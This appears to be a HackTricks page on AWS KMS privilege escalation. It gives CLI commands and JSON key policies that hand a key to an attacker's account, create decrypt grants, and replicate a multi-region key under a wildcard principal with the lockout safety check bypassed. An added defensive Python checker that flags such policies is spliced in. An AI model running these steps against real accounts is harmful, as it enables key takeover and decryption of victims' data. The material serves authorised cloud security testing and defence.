AWS - KMS Privesc

Support HackTricks

KMS

For more information about KMS check:

kms:ListKeys, kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

With these permissions it is possible to change the access permissions of a key so that it can be used by another account or even by anyone:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

kms:CreateGrant

Allows a principal to use the KMS key:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Note that it may take a few minutes for KMS to let the user use the key after the grant is created. Once that time has passed, the principal can use the KMS key without needing to specify anything. However, if the grant needs to be used immediately, use a grant token (see the following code). For more information read this.

# Use the grant token in a request
# $token holds the GrantToken value returned by the create-grant call above
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--key-spec AES_256 \
--grant-tokens $token

Note that it is possible to list the grants of a key with:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

With these permissions it is possible to replicate a multi-region KMS key into a different region with a different policy.

Therefore, an attacker could abuse this to privesc their access to the key and use it.

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}
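Both policies above (the PutKeyPolicy one that adds an external account as principal, and the ReplicateKey one that sets the principal to "*") share the same detectable shape. As an added example that is not part of the original page, a small Python check a defender can run over `aws kms get-key-policy` output to flag Allow statements whose principal is a wildcard or an account outside an allow-list; the sample policy and all account IDs are constructed placeholders.

```python
import json
import re

# Constructed sample modelled on the policies shown on this page: the first
# statement is the normal account-root one, the second trusts a second account
# and the third is open to anyone. All account IDs are placeholders.
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "Enable IAM User Permissions", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
     "Action": "kms:*", "Resource": "*"},
    {"Sid": "Allow all use", "Effect": "Allow",
     "Principal": {"AWS": ["arn:aws:iam::222222222222:root"]},
     "Action": ["kms:*"], "Resource": "*"},
    {"Sid": "Open to anyone", "Effect": "Allow",
     "Principal": {"AWS": "*"},
     "Action": "kms:Decrypt", "Resource": "*"},
]})

ARN_ACCOUNT = re.compile(r"^arn:aws:iam::(\d{12}):")


def _principals(statement):
    """Normalise the Principal field to a list of strings ('*', ARNs or account IDs)."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return ["*"]
    aws = principal.get("AWS", []) if isinstance(principal, dict) else []
    return aws if isinstance(aws, list) else [aws]


def _account_of(principal):
    """Map a principal string to its 12-digit account ID, or '*' for a wildcard."""
    if principal == "*":
        return "*"
    match = ARN_ACCOUNT.match(principal)
    return match.group(1) if match else principal  # bare account ID or unknown form


def find_untrusted_grants(policy_json, trusted_accounts):
    """Return (Sid, principal) pairs for Allow statements whose principal is a
    wildcard or belongs to an account not in trusted_accounts."""
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        for principal in _principals(stmt):
            if _account_of(principal) not in trusted_accounts:
                findings.append((stmt.get("Sid", ""), principal))
    return findings
```

Running it against every key's policy after a `put-key-policy` or `replicate-key` CloudTrail event turns the two patterns on this page into an alert instead of a surprise.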

kms:Decrypt

This permission allows using the key to decrypt some information. For more information check:
